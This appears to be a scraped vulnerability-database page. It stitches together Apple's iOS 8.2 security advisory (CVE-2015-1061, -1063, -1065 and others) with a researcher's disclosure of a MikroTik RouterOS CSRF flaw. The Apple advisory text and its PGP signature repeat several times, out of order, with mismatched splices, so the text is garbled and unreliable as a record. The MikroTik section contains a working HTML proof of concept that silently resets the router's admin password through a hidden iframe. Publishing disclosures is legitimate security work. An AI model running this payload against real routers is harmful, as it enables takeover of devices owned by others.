CVE-2015-1062 : TaiG Jailbreak Team
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: Secure Transport accepted short ephemeral RSA keys,
usually used only in export-strength RSA cipher suites, on
connections using full-strength RSA cipher suites. This issue, also
known as FREAK, only affected connections to servers which support
export-strength RSA cipher suites, and was addressed by removing
support for ephemeral RSA keys.
CVE-ID
CVE-2015-1067 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
Prosecco at Inria Paris
Springboard
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device is not activated
Description: An unexpected application termination during activation
could have caused the device to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2015-1064
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.2".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJU/fWsAAoJEBcWfLTuOo7t7VUQAIsLCBlvhkiqbJ4xdanG1RZI
Ld7787ljx6ksnLMiFJNCECOIm3fk7TKMUfFn7HXYR/hg/w0GPb7dXUNkNh9IhdjF
H8dur2Eb3iR3EPDhnGvPcgic059SKKgVUgyzMfr8td3onswWq90aG+8eAgq3ri9B
qAL8wUSoXDz0VPUJ2H7VcktfcdXqFmS5lPGa8PpEAzNAhN+utsw61yoJgILHh9g6
5axRobZFpd7CKy+ADPUtlMUYQQliRX+BNX+ZZgh1bsEmXJMmeHxKjEN6Iq18ObD7
ucFihWs6WFroDHuHMvuR/yJARqInChMzd/EMkjSfHH2ldSbTyGmsTp/4D1aofQMp
V6D8JjsHvdb/jWq5qCmFEBXf1VpXXqvNI1rq3D7qHOIJJPQH5afzI9ujymOrsspH
Li0lD2TrwnLJznoRgAGVYSo0dhouUmhRYkd4zJkQMoR/Rn/aL3xWGT5XhFEkfdFD
rvFv0LgaiC/5jbLZczUVk1yYQTkJ4mM8h02GnHd1CLvSdf1naEvTw3goBJguI233
5R89HVZA0Z2P6Vyk1bn5V0SWYasVATmjfr89lkhESVVfszakEvxTxmg4fZ65Gwtq
MWSMUBzFZT09abSUEH27BYVGYoe1HCk8sAKlOhMvd1s2O54kZbHeuIMvfrYT5C0d
3T50q8/I5HSn+5c9eHvz
=l+X4
-----END PGP SIGNATURE-----
| VAR-201503-0076 | CVE-2015-1063 | Apple iOS of CoreTelephony Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
CoreTelephony in Apple iOS before 8.2 allows remote attackers to cause a denial of service (NULL pointer dereference and device restart) via a Class 0 SMS message. Supplementary information : CWE Vulnerability type by CWE-476: NULL Pointer Dereference (NULL Pointer dereference ) Has been identified. Apple IOS is prone to a denial-of-service vulnerability.
Attackers can exploit this issue to restart the affected device, denying service to legitimate users. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. This issue was
addressed through improved message validation.
CVE-ID
CVE-2015-1063 : Roman Digerberg, Sweden
iCloud Keychain
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may be able
to execute arbitrary code
Description: Multiple buffer overflows existed in the handling of
data during iCloud Keychain recovery. These issues were addressed
through improved bounds checking.
CVE-ID
CVE-2015-1065 : Andrey Belenko of NowSecure
IOSurface
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A type confusion issue existed in IOSurface's handling
of serialized objects. The issue was addressed through additional
type checking.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
MobileStorageMounter
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to create folders in
trusted locations in the file system
Description: An issue existed in the developer disk mounting logic
which resulted in invalid disk image folders not being deleted. This
was addressed through improved error handling.
CVE-ID
CVE-2015-1062 : TaiG Jailbreak Team
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: Secure Transport accepted short ephemeral RSA keys,
usually used only in export-strength RSA cipher suites, on
connections using full-strength RSA cipher suites. This issue, also
known as FREAK, only affected connections to servers which support
export-strength RSA cipher suites, and was addressed by removing
support for ephemeral RSA keys.
CVE-ID
CVE-2015-1067 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
Prosecco at Inria Paris
Springboard
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device is not activated
Description: An unexpected application termination during activation
could have caused the device to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2015-1064
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.2".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJU/fWsAAoJEBcWfLTuOo7t7VUQAIsLCBlvhkiqbJ4xdanG1RZI
Ld7787ljx6ksnLMiFJNCECOIm3fk7TKMUfFn7HXYR/hg/w0GPb7dXUNkNh9IhdjF
H8dur2Eb3iR3EPDhnGvPcgic059SKKgVUgyzMfr8td3onswWq90aG+8eAgq3ri9B
qAL8wUSoXDz0VPUJ2H7VcktfcdXqFmS5lPGa8PpEAzNAhN+utsw61yoJgILHh9g6
5axRobZFpd7CKy+ADPUtlMUYQQliRX+BNX+ZZgh1bsEmXJMmeHxKjEN6Iq18ObD7
ucFihWs6WFroDHuHMvuR/yJARqInChMzd/EMkjSfHH2ldSbTyGmsTp/4D1aofQMp
V6D8JjsHvdb/jWq5qCmFEBXf1VpXXqvNI1rq3D7qHOIJJPQH5afzI9ujymOrsspH
Li0lD2TrwnLJznoRgAGVYSo0dhouUmhRYkd4zJkQMoR/Rn/aL3xWGT5XhFEkfdFD
rvFv0LgaiC/5jbLZczUVk1yYQTkJ4mM8h02GnHd1CLvSdf1naEvTw3goBJguI233
5R89HVZA0Z2P6Vyk1bn5V0SWYasVATmjfr89lkhESVVfszakEvxTxmg4fZ65Gwtq
MWSMUBzFZT09abSUEH27BYVGYoe1HCk8sAKlOhMvd1s2O54kZbHeuIMvfrYT5C0d
3T50q8/I5HSn+5c9eHvz
=l+X4
-----END PGP SIGNATURE-----
| VAR-201503-0078 | CVE-2015-1065 | Apple iOS and Apple OS X of iCloud Keychain buffer overflow vulnerability |
CVSS V2: 5.4 CVSS V3: - Severity: MEDIUM |
Multiple buffer overflows in iCloud Keychain in Apple iOS before 8.2 and Apple OS X through 10.10.2 allow man-in-the-middle attackers to execute arbitrary code by modifying the client-server data stream during keychain recovery. Apple Mac OS X and iOS are prone to multiple buffer-overflow vulnerabilities because they fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.
An attacker can leverage these issues to execute arbitrary code with system privileges. Failed exploit attempts will likely result in denial-of-service conditions. Both Apple iOS and OS X are operating systems of Apple Inc. in the United States. Apple iOS was developed for mobile devices; OS X was developed for Mac computers.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
Note: Security Update 2015-003 includes the content of
Security Update 2015-002. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2015-03-09-1 iOS 8.2
iOS 8.2 is now available and addresses the following:
CoreTelephony
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker can cause a device to unexpectedly restart
Description: A null pointer dereference issue existed in
CoreTelephony's handling of Class 0 SMS messages. This issue was
addressed through improved message validation. These issues were addressed
through improved bounds checking.
CVE-ID
CVE-2015-1065 : Andrey Belenko of NowSecure
IOSurface
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A type confusion issue existed in IOSurface's handling
of serialized objects. The issue was addressed through additional
type checking.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
MobileStorageMounter
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to create folders in
trusted locations in the file system
Description: An issue existed in the developer disk mounting logic
which resulted in invalid disk image folders not being deleted. This
was addressed through improved error handling.
CVE-ID
CVE-2015-1062 : TaiG Jailbreak Team
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: Secure Transport accepted short ephemeral RSA keys,
usually used only in export-strength RSA cipher suites, on
connections using full-strength RSA cipher suites. This issue, also
known as FREAK, only affected connections to servers which support
export-strength RSA cipher suites, and was addressed by removing
support for ephemeral RSA keys.
CVE-ID
CVE-2015-1067 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
Prosecco at Inria Paris
Springboard
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device is not activated
Description: An unexpected application termination during activation
could have caused the device to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2015-1064
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.2".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJU/fWsAAoJEBcWfLTuOo7t7VUQAIsLCBlvhkiqbJ4xdanG1RZI
Ld7787ljx6ksnLMiFJNCECOIm3fk7TKMUfFn7HXYR/hg/w0GPb7dXUNkNh9IhdjF
H8dur2Eb3iR3EPDhnGvPcgic059SKKgVUgyzMfr8td3onswWq90aG+8eAgq3ri9B
qAL8wUSoXDz0VPUJ2H7VcktfcdXqFmS5lPGa8PpEAzNAhN+utsw61yoJgILHh9g6
5axRobZFpd7CKy+ADPUtlMUYQQliRX+BNX+ZZgh1bsEmXJMmeHxKjEN6Iq18ObD7
ucFihWs6WFroDHuHMvuR/yJARqInChMzd/EMkjSfHH2ldSbTyGmsTp/4D1aofQMp
V6D8JjsHvdb/jWq5qCmFEBXf1VpXXqvNI1rq3D7qHOIJJPQH5afzI9ujymOrsspH
Li0lD2TrwnLJznoRgAGVYSo0dhouUmhRYkd4zJkQMoR/Rn/aL3xWGT5XhFEkfdFD
rvFv0LgaiC/5jbLZczUVk1yYQTkJ4mM8h02GnHd1CLvSdf1naEvTw3goBJguI233
5R89HVZA0Z2P6Vyk1bn5V0SWYasVATmjfr89lkhESVVfszakEvxTxmg4fZ65Gwtq
MWSMUBzFZT09abSUEH27BYVGYoe1HCk8sAKlOhMvd1s2O54kZbHeuIMvfrYT5C0d
3T50q8/I5HSn+5c9eHvz
=l+X4
-----END PGP SIGNATURE-----
.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
Kernel
Available for: OS X Yosemite v10.10.2
Impact: Maliciously crafted or compromised applications may be able
to determine addresses in the kernel
Description: The mach_port_kobject kernel interface leaked kernel
addresses and heap permutation value, which may aid in bypassing
address space layout randomization protection. This was addressed by
disabling the mach_port_kobject interface in production
configurations
| VAR-201503-0074 | CVE-2015-1061 | plural Apple Product IOSurface Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
IOSurface in Apple iOS before 8.2, Apple OS X through 10.10.2, and Apple TV before 7.1 allows attackers to execute arbitrary code in a privileged context via a crafted app that leverages "type confusion" during serialized-object handling. Apple iOS, Mac Os X, and TV are prone to a remote code-execution vulnerability.
An attacker can leverage this issue to execute arbitrary code with system privileges. Failed exploit attempts will likely result in denial-of-service conditions. in the United States. A security vulnerability exists in IOSurface in several Apple products.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
Note: Security Update 2015-003 includes the content of
Security Update 2015-002. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2015-03-09-1 iOS 8.2
iOS 8.2 is now available and addresses the following:
CoreTelephony
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A remote attacker can cause a device to unexpectedly restart
Description: A null pointer dereference issue existed in
CoreTelephony's handling of Class 0 SMS messages. This issue was
addressed through improved message validation.
CVE-ID
CVE-2015-1063 : Roman Digerberg, Sweden
iCloud Keychain
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may be able
to execute arbitrary code
Description: Multiple buffer overflows existed in the handling of
data during iCloud Keychain recovery. These issues were addressed
through improved bounds checking.
CVE-ID
CVE-2015-1065 : Andrey Belenko of NowSecure
IOSurface
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A type confusion issue existed in IOSurface's handling
of serialized objects. The issue was addressed through additional
type checking.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
MobileStorageMounter
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to create folders in
trusted locations in the file system
Description: An issue existed in the developer disk mounting logic
which resulted in invalid disk image folders not being deleted. This
was addressed through improved error handling.
CVE-ID
CVE-2015-1062 : TaiG Jailbreak Team
Secure Transport
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: Secure Transport accepted short ephemeral RSA keys,
usually used only in export-strength RSA cipher suites, on
connections using full-strength RSA cipher suites. This issue, also
known as FREAK, only affected connections to servers which support
export-strength RSA cipher suites, and was addressed by removing
support for ephemeral RSA keys.
CVE-ID
CVE-2015-1067 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
Prosecco at Inria Paris
Springboard
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to the device may be able to
see the home screen of the device even if the device is not activated
Description: An unexpected application termination during activation
could have caused the device to show the home screen. The issue was
addressed through improved error handling during activation.
CVE-ID
CVE-2015-1064
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8.2".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.22 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJU/fWsAAoJEBcWfLTuOo7t7VUQAIsLCBlvhkiqbJ4xdanG1RZI
Ld7787ljx6ksnLMiFJNCECOIm3fk7TKMUfFn7HXYR/hg/w0GPb7dXUNkNh9IhdjF
H8dur2Eb3iR3EPDhnGvPcgic059SKKgVUgyzMfr8td3onswWq90aG+8eAgq3ri9B
qAL8wUSoXDz0VPUJ2H7VcktfcdXqFmS5lPGa8PpEAzNAhN+utsw61yoJgILHh9g6
5axRobZFpd7CKy+ADPUtlMUYQQliRX+BNX+ZZgh1bsEmXJMmeHxKjEN6Iq18ObD7
ucFihWs6WFroDHuHMvuR/yJARqInChMzd/EMkjSfHH2ldSbTyGmsTp/4D1aofQMp
V6D8JjsHvdb/jWq5qCmFEBXf1VpXXqvNI1rq3D7qHOIJJPQH5afzI9ujymOrsspH
Li0lD2TrwnLJznoRgAGVYSo0dhouUmhRYkd4zJkQMoR/Rn/aL3xWGT5XhFEkfdFD
rvFv0LgaiC/5jbLZczUVk1yYQTkJ4mM8h02GnHd1CLvSdf1naEvTw3goBJguI233
5R89HVZA0Z2P6Vyk1bn5V0SWYasVATmjfr89lkhESVVfszakEvxTxmg4fZ65Gwtq
MWSMUBzFZT09abSUEH27BYVGYoe1HCk8sAKlOhMvd1s2O54kZbHeuIMvfrYT5C0d
3T50q8/I5HSn+5c9eHvz
=l+X4
-----END PGP SIGNATURE-----
.
CVE-ID
CVE-2015-1061 : Ian Beer of Google Project Zero
Kernel
Available for: OS X Yosemite v10.10.2
Impact: Maliciously crafted or compromised applications may be able
to determine addresses in the kernel
Description: The mach_port_kobject kernel interface leaked kernel
addresses and heap permutation value, which may aid in bypassing
address space layout randomization protection. This was addressed by
disabling the mach_port_kobject interface in production
configurations
| VAR-201503-0428 | CVE-2015-2350 | MikroTik RouterOS Cross-Site Request Forgery Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in MikroTik RouterOS 5.0 and earlier allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via a request in the status page to /cfg. MikroTik RouterOS is an operating system for routers. MikroTik RouterOS is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. This system turns a PC computer into a professional router. MikroTik RouterOS < v5.0 Admin Password Change CSRF Vulnerability by
@SymbianSyMoh
What is MikroTik RouterOS?!
MikroTik RouterOS is an operating system based on the Linux kernel, known
as the MikroTik RouterOS. Installed on the company's proprietary hardware
(RouterBOARD series), or on standard x86-based computers, it turns a
computer into a network router and implements various additional features,
such as firewalling, virtual private network (VPN) service and client,
bandwidth shaping and quality of service, wireless access point functions
and other commonly used features when interconnecting networks. The system
is also able to serve as a captive-portal-based hotspot system.
__"Wikipedia"
What is CSRF Attack?!
Cross-Site Request Forgery (CSRF) is an attack which forces an end user to
execute unwanted actions on a web application in which he/she is currently
authenticated. CSRF attacks specifically target state-changing requests,
not theft of data, since the attacker has no way to see the response to the
forged request. With a little help of social engineering (like sending a
link via email/chat), an attacker may trick the users of a web application
into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to perform state
changing requests like transfering funds, changing their email address,
etc. If the victim is an administrative account, CSRF can compromise the
entire web application.
__"OWASP"
Affected Versions:
All MikroTik RouterOS versions before v5.0
PoC Code:
<html>
<body>
<title>MikroTik RouterOS < v4 Admin Password Change CSRF
Vulnerability</title>
<h1><b>MikroTik RouterOS < v4 Admin Password Change CSRF Vulnerability by
@SymbianSyMoh</b></h1></br>
<input type="submit" value="Do it" onclick="var
btn=document.createElement('IFRAME');btn.src='
http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok';btn.width='0';btn.height='0';btn.id='myIframe';document.body.appendChild(btn);alert('Pwned')
<http://s.bl-1.com/h/mPQQyg5?url=http://192.168.0.2/cfg?page=status&counter=1000&process=password&password1=Pwn3D2015&password2=Pwn3D2015&button=ok%27;btn.width=%270%27;btn.height=%270%27;btn.id=%27myIframe%27;document.body.appendChild(btn);alert(%27Pwned%27)>
;"></br>
</body>
</html>
Video PoC:
http://youtu.be/FHrvHJeLjLA
<http://s.bl-1.com/h/mPQQ237?url=http://youtu.be/FHrvHJeLjLA>
--
*Best Regards**,**,*
*Mohamed Abdelbaset Elnoby*Guru Programmer, Information Security Evangelist
& Bug Bounty Hunter.
LinkedIn
<http://s.bl-1.com/h/mPQQ6S9?url=https://www.linkedin.com/in/symbiansymoh>Curriculum
Vitae <http://s.bl-1.com/h/mPQQCrC?url=http://goo.gl/cNrVpL>
<http://s.bl-1.com/h/mPQQHFF?url=https://www.linkedin.com/in/symbiansymoh>
Facebook
<http://s.bl-1.com/h/mPQQNfH?url=https://fb.com/symbiansymoh>Twitter
<http://s.bl-1.com/h/mPQQS2K?url=https://twitter.com/symbiansymoh>